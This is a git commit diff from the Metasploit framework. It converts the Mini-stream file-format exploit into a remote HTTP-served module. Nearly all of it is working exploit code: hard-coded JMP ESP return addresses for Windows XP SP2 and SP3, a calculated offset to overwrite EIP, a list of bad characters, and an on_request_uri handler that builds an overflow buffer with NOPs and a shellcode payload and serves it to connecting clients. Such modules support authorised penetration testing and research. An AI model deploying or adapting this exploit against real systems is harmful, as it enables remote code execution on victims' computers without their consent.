Upgrade mini_stream as a remote module. Account for all variables that affect the offset to EIP. Also digital1 = Ron.

git-svn-id: file:///home/svn/framework3/trunk@14155 4d416f70-5f16-0410-b530-b9f4589650da
2011-11-04 08:20:43 +00:00 · 2011-11-04 08:20:43 +00:00 · 3d6f631780
parent 057725450c
commit 3d6f631780
1 changed files with 36 additions and 17 deletions
--- a/modules/exploits/windows/fileformat/mini_stream.rb
+++ b/modules/exploits/windows/fileformat/mini_stream.rb
@ -14,7 +14,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking

-	include Msf::Exploit::FILEFORMAT
+	include Msf::Exploit::Remote::HttpServer::HTML

 	def initialize(info = {})
 		super(update_info(info,
@ -28,8 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Author' =>
 				[
 					'CORELAN Security Team ',
-					'Ron Henry <rlh[at] ciphermonk.net>', # Return address update
-					'dijital1',
+					'Ron Henry <rlh[at]ciphermonk.net>', # dijital1; Return address update
 				],
 			'Version' => '$Revision$',
 			'References' =>
@ -40,19 +39,30 @@ class Metasploit3 < Msf::Exploit::Remote
 			'DefaultOptions' =>
 				{
 					'EXITFUNC' => 'thread',
-					'DisablePayloadHandler' => 'true',
 				},
 			'Payload' =>
 				{
 					'Space' => 3500,
 					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
-					'StackAdjustment' => -3500,
+					'StackAdjustment' => -3500
 				},
 			'Platform' => 'win',
 			'Targets' =>
 				[
-					[ 'Windows XP SP3 - English', { 'Ret' => 0x7e429353} ], 		# 0x7e429353 JMP ESP - USER32.dll
-					[ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], 		# 0x7c941eed JMP ESP - SHELL32.dll
+					[
+						'Windows XP SP3 ENG',
+						{
+							'Ret'    => 0x7e429353,  # 0x7e429353 JMP ESP - USER32.dll
+							'Offset' => 17417
+						}
+					],
+					[
+						'Windows XP SP2 ENG',
+						{
+							'Ret'    => 0x7c941eed,  # 0x7c941eed JMP ESP - SHELL32.dll
+							'Offset' => 17417
+						}
+					]
 				],
 			'Privileged' => false,
 			'DisclosureDate' => 'Dec 25 2009',
@ -60,21 +70,30 @@ class Metasploit3 < Msf::Exploit::Remote

 		register_options(
 			[
-				OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.pls']),
+				OptString.new('URIPATH',  [ true,  'The URI to use for this exploit', 'msf.pls'])
 			], self.class)
 	end


-	def exploit
-		sploit = rand_text_alphanumeric(17403)
-		sploit << [target.ret].pack('V')
-		sploit << "CAFE" * 8
-		sploit << payload.encoded
+	def on_request_uri(cli, request)
+		# Calculate the correct offset
+		host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+		host << ":#{datastore['SRVPORT']}/"
+		offset = target['Offset'] - host.length

-		print_status("Creating '#{datastore['FILENAME']}' file ...")
-		file_create(sploit)
-		print_status("Copy '#{datastore['FILENAME']}' to a web server and pass the URL to the application")
+		# Construct our buffer
+		sploit = rand_text_alpha(offset)
+		sploit << [target.ret].pack('V')
+		sploit << make_nops(32)
+		sploit << @p
+
+		print_status("Sending malicous payload #{cli.peerhost}:#{cli.peerport}...")
+		send_response(cli, sploit, {'Content-Type'=>'application/pls+xml'})
+	end
+
+	def exploit
+		@p = payload.encoded
+		super
 	end

 end
-